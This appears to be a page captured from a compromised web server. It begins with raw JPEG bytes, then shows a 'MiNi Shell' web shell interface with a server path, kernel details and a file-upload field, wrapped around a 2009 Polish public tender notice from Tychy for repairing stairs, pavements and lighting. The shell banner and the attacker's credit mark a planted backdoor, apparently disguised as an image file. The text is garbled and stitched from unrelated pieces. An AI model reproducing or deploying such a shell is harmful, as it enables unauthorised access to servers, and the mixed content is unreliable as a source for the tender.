JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/155736-N-2009.html

<p class="kh_header"><b>Tychy: Remont obszaru wejścia do osiedla A od strony ulicy Burschego w Tychach</b><br>
<b>Numer ogłoszenia: 155736 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów , ul. Budowlanych 59, 43-100 Tychy, woj. śląskie, tel. 032 227-70-06, 3271491, faks 032 2277008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont obszaru wejścia do osiedla A od strony ulicy Burschego w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. DZIAŁ OGÓLNY
1. Inwentaryzacja powykonawcza - 1 kpl
2. Tymczasowe zaplecze wykonawcy oraz montaż i demontaż oznakowania robót - 1 kpl
                	
II. SCHODY GŁÓWNE
1. Demontaż istniejących schodów z odwozem gruzu i utylizacją - 13,73 m3
- krawężniki 15x30 cm - 102,00 m, 
- spoczniki z płyt bet. 50x50x7 cm - 130,52 m2
2. Ręczne wykonanie koryta pod schody (krawędzie 40 cm, spoczniki 28 cm) - 142,60 m2 (wraz z odwozem ziemi i utylizacją - 47,06 m3)                                                               
3. Wykonanie warstwy odcinającej grubości 5 cm - 142,60 m2 
4. Wykonanie podbudowy z kruszywa kamiennego dolomitowego - 142,60 m2                             
- spoczniki w ilości 83,16 m2 - 15+5 cm (tłuczeń + kliniec)
- krawędzie i podjazdy w ilości 59,44 m2 - 15+15 cm (tłuczeń + kliniec)        
5. Wykonanie schodów:
- krawędzie z płyt 40x100x15 cm (typu Brukbet Trawertyn - krem prowansalli) - 75,60 m  
- spoczniki z kostki brukowej - 83,16 m2
- podjazdy z płyt 40x100x15 cm (typu Brukbet Trawertyn - krem prowansalli) - 30,80 m2           

III. SCHODY OD UL. BURSCHEGO
1. Demontaż istniejących schodów z odwozem gruzu i utylizacją - 1,43 m3
- krawężniki 15x30 cm - 15,00 m, 
- spoczniki z płyt bet. 50x50x7 cm - 10,79 m2
2. Ręczne wykonanie koryta pod schody (krawędzie - 40 cm, spoczniki - 28 cm, logo - 10 cm) - 56,00 m2 (wraz z odwozem ziemi i utylizacją - 8,59 m3)                                             
3. Wykonanie warstwy odcinającej grubości 5 cm - 14,54 m2 
4. Wykonanie podbudowy z kruszywa kamiennego dolomitowego - 14,54 m2                             
- spoczniki w ilości 4,50 m2 - 15+5 cm (tłuczeń + kliniec)
- krawędzie i podjazdy w ilości 10,04 m2 - 15+15 cm (tłuczeń + kliniec)        
5. Wykonanie schodów:
- krawędzie z płyt 40x100x15 cm (typu Brukbet Trawertyn - krem prowansalli) - 15,30 m  
- spoczniki z kostki brukowej (typu Libet Via Castello-pastello gr.7 cm) - 4,50 m2
- podjazdy z płyt 40x100x15 cm (typu Brukbet Trawertyn - krem prowansalli) - 3,92 m2           

IV. CHODNIKI I PLACE
1. Roboty rozbiórkowe z odwozem gruzu i utylizacją - 27,18 m3
- obrzeża 8x30 cm - 56,5 m  
- płyty chodnikowe bet. 50x50x7 cm - 309,66 m,  
- podbudowa betonowa gr. 10 cm pod Logo - 41,46 m2
2. Wykonanie koryta głębokości 28 cm - 309,66 m2 (wraz z odwozem i utylizacja - 86,7 m3)                    
(mechanicznie - 70 %, ręcznie - 30 %) 
3. Wykonanie warstwy odcinającej grubości 5 cm (mechan.- 70 %, ręcznie - 30 %) - 309,66 m2
4. Wykonanie podbudowy z kruszywa kamiennego dolomitowego gr.15 cm - warstwa dolna (mechanicznie 70 %, ręcznie 30 %) - 309,66 m2 
5. Wykonanie warstwy górnej podbudowy grubości 5 cm - 351,12 m2 
- chodniki i place w ilości - 309,66 m2 
- logo w ilości - 41,46 m2          
6. Wykonanie nawierzchni chodników i placy                                                                                            
- Typu Libet Colormix 7 cm Via Castello, kolor pastello - 233,28 m2  
- Typu Libet Colormix 7 cm Via Castello, kolory jesieni - pasy - 76,38 m2
- Typu Libet Colormix 7 cm Via Castello, kolor magma - LOGO - 41,74 m2     
- obrzeże - palisada 12,4x20 cm typu Libet KRAVENTO GRANDE Colormix - 64,70 m     
 
V. ELEMENTYY MAŁEJ ARCHITEKTURY  
1. Wykopy fundamentowe (murki) z odwozem i utylizacją - 2,52 m3   
2. Ławy fundamentowe betonowe murku szer.0,8 m - 2,52 m3
3. Uzupełnienie ścian lub zapełnienie cegłami otworów - 3,12 m3
4. Fundament z cegieł na zaprawie cementowej - 1,92 m3
5. Obłożenie ścianek murku płytami z łamanego piaskowca breneńskiego gr. 4 cm - 10,92 m2
6. Ułożenie czap na murku z ciętych bloków piaskowca breneńskiego 10x 40 cm - 60,00 m
7. Piaskowanie i impregnacja hydrofobowa murku - 80,34 m2
8. Rozścielenie ziemi urodzajnej gr. 10 cm i wykonanie trawników dywanowych - 37,75 m2 
9. Przesadzenie drzew - 10,00 szt   
10. Montaż ławek ogrodowych typu Trapp wraz z fundamentami - 6,00 szt   

VI. OŚWIETLENIE TERENU LATARNI       
1. Montaż latarni oświetleniowej typu TRAPP 120 wraz z oprawą THL-141 70 W, fundamentem prefabrykowanym, oprawami i przewodami do opraw - 6,00 kpl
2. Ułożenie kabli YAKI 4x16 mm z wykopaniem rowu, nasypaniem w-wy piasku i zasypaniem rowów - 118,00 m
3. Wykonanie przewiertu pod ulicą jedną rurą o średnicy 75 mm - 1,00 szt
4. Ułożenie rur ochronnych z PCW w  wykopie o średnicy AR-40 - 26,00 m  
5. Wciąganie kabla YAKI  4x16 mm do rur i słupów z obróbką końców - 47,00 m                                                            
6. Wciąganie kabla YKY 3x4 mm do rur i słupów z obróbką końców - 10,00 m
7. Montaż rozdzielni RW 1x6 - 1,00 kpl
8. Montaż przewodów do lampy oraz elementów oświetlenia lampy górniczej - 1,00 kpl
9. Pomiar linii kablowych do 1 kV 4- żyłowej i sprawdzenie obwodów instalacji - 7,00 odc
10. Pomiar zerowania instalacji ochronnej - 7,00 szt.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.27.10-5, 45.23.32.22-1, 45.31.43.10-7, 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 pzp, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24  pzp. 

Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu w zakresie warunku wskazanego w punkcie 2:
a). udokumentowanie wykonania w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. roboty polegającej na budowie lub przebudowie lub remoncie placu lub chodnika w technologii kostki brukowej o wartości co najmniej 150.000,00 zł netto.

W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek musi spełnić co najmniej jeden podmiot.  

b) wykazanie, iż wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia tj.:
- kierownikiem budowy, posiadającym uprawnienia do kierowania robotami budowlanymi w branży drogowej lub konstrukcyjno - budowlanej w zakresie odpowiadającym przedmiotowi zamówienia.

Osoba odpowiedzialna za realizację ww. funkcji, zgodnie z obowiązującymi przepisami winna posiadać stosowne uprawnienia zawodowe oraz zaświadczenie o przynależności do właściwej Okręgowej Izby.

- co najmniej 2 osobami posiadającymi zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności zwianych z kierowaniem ruchem drogowym wydane przez Wojewódzka Komendę Policji lub Wojewódzki Ośrodek Ruchu Drogowego.

Osoby odpowiedzialne za realizację ww. funkcji winny posiadać stosowne zaświadczenia o ukończeniu szkolenia w ww. zakresie.

W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełniać łącznie. 

c) wykazanie niezbędnych do wykonania zamówienia narzędzi i urządzeń jn., którymi dysponuje lub będzie dysponował wykonawca:
- koparko-ładowarka - 1 szt.
- zagęszczarka - 1 szt.
- młot pneumatyczny lub spalinowy - 1 szt.
- piła do ciecia - 1 szt.
- płyta wibracyjna - 2 szt.
- samochód dostawczy - 1 szt.
- samochód samowyładowczy - 2 szt. 

W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełniać łącznie. 

Ocena spełnienia tych warunków odbywać się będzie na zasadzie spełnia - nie spełnia na podstawie złożonych oświadczeń i załączonych dokumentów wymaganych przez zamawiającego zgodnie ustawą Prawo zamówień publicznych oraz określonych w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz. U. Nr 87 poz. 605 z późn. zm.) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zgodnie z art. 24 ust. 2 pkt 3, art. 26 ust. 2 pzp i rozporządzeniem Prezesa Rady Ministrów z 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.) zamawiający żąda złożenia następujących oświadczeń i dokumentów:     
1. w celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie art. 24 pzp, należy załączyć następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez  każdy podmiot.
b) oświadczenie o spełnianiu przez wykonawcę warunków określonych w art. 22 ust. 1 pzp i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 pzp.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z przepisami rozporządzenia wykonawczego do pzp w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja  2006 r. Dz. U. Nr 87, poz. 605 z późn. zm.).  
           
2. w celu potwierdzenia, że wykonawca, posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, zamawiający żąda następujących dokumentów:
a). wykaz wykonanej co najmniej 1 roboty budowlanej w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem jej wartości oraz daty i miejsca wykonania tj. zał. DOŚWIADCZENIE ZAWODOWE wraz z załączeniem dokumentu potwierdzającego, że robota ta została wykonana należycie.

b). wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności tj. zał. WYKAZ OSÓB wraz z załączeniem kopii uprawnień zawodowych i zaświadczenia o przynależności do właściwej Okręgowej Izby oraz kopii zaświadczeń o ukończeniu szkolenia z zakresu wykonywania niektórych czynności zwianych z kierowaniem ruchem drogowym.

Jeżeli w wykazie tym wykonawca wskaże osoby, którymi będzie dysponował winien złożyć również pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

c). wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca - tj. zał. WYKAZ NARZĘDZI I URZADZEŃ.

Jeżeli w wykazie tym wykonawca wskaże narzędzia i urządzenia, którymi będzie dysponował winien złożyć również pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzuim.tychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 09:00, miejsce: Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com